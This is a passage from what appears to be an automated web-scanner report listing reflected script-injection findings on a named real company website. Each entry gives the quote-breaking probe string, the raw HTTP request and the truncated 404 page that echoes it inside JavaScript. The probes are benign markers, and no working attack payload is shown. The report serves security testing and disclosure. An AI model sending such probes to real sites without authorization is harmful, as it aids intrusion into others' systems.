Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templatesf5aeb";65e1fbc3483/vzbar/bert.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1101. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4cbd"%3b63b84d41ee1 was submitted in the REST URL parameter 2. This input was echoed as f4cbd";63b84d41ee1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbarf4cbd"%3b63b84d41ee1/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:20 GMT
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/vzbarf4cbd";63b84d41ee1/bert.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCT
...[SNIP]...

1.1102. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f376'%3b2bcaed41004 was submitted in the REST URL parameter 2. This input was echoed as 2f376';2bcaed41004 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbar2f376'%3b2bcaed41004/bert.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:31 GMT
Content-Type: text/html
Content-Length: 40630
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates/vzbar2f376';2bcaed41004/bert.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1103. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d6d"%3bac75314e6a7 was submitted in the REST URL parameter 3. This input was echoed as 62d6d";ac75314e6a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbar/bert.xml62d6d"%3bac75314e6a7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/vzbar/bert.xml62d6d";ac75314e6a7";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1104. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/vzbar/bert.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 587d9'%3bf785c3b4b56 was submitted in the REST URL parameter 3. This input was echoed as 587d9';f785c3b4b56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/vzbar/bert.xml587d9'%3bf785c3b4b56 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/templates/vzbar/bert.xml587d9';f785c3b4b56'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1105. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eceaa"%3b8d8c1449d07 was submitted in the REST URL parameter 1. This input was echoed as eceaa";8d8c1449d07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /termseceaa"%3b8d8c1449d07/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40610
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/termseceaa";8d8c1449d07/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1106. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79116'%3b3d322ec6d06 was submitted in the REST URL parameter 1. This input was echoed as 79116';3d322ec6d06 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms79116'%3b3d322ec6d06/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:57 GMT
Content-Type: text/html
Content-Length: 40610
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/terms79116';3d322ec6d06/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1107. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /thinkforward/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9649b'%3b98d581e15b was submitted in the REST URL parameter 1. This input was echoed as 9649b';98d581e15b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9649b'%3b98d581e15b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/9649b';98d581e15b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1108. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /thinkforward/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b151"%3b9c978325f14 was submitted in the REST URL parameter 1. This input was echoed as 6b151";9c978325f14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6b151"%3b9c978325f14/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
"; }
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/6b151";9c978325f14/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1109. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /topnav.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c26a"%3b50ea20905ac was submitted in the REST URL parameter 1. This input was echoed as 3c26a";50ea20905ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topnav.xml3c26a"%3b50ea20905ac?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:17 GMT
Vary: *
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:17 GMT
Connection: close
Set-Cookie: Lang=en; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:03:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/topnav.xml3c26a";50ea20905ac";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1110. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /topnav.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1059d'%3b3542eebd779 was submitted in the REST URL parameter 1. This input was echoed as 1059d';3542eebd779 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topnav.xml1059d'%3b3542eebd779?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:29 GMT
Vary: *
Content-Type: text/html
Content-Length: 40600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:29 GMT
Connection: close
Set-Cookie: Lang=en; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:03:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/topnav.xml1059d';3542eebd779'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1111. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /tw/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7f5d'%3b29238dbf312 was submitted in the REST URL parameter 1. This input was echoed as b7f5d';29238dbf312 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /twb7f5d'%3b29238dbf312/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Date: Wed, 17 Nov 2010 01:00:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/twb7f5d';29238dbf312/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1112. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /tw/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a831"%3bd765c5a4d5d was submitted in the REST URL parameter 1. This input was echoed as 3a831";d765c5a4d5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tw3a831"%3bd765c5a4d5d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/tw3a831";d765c5a4d5d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1113. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 273a8'%3bb5d548f241a was submitted in the REST URL parameter 1. This input was echoed as 273a8';b5d548f241a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

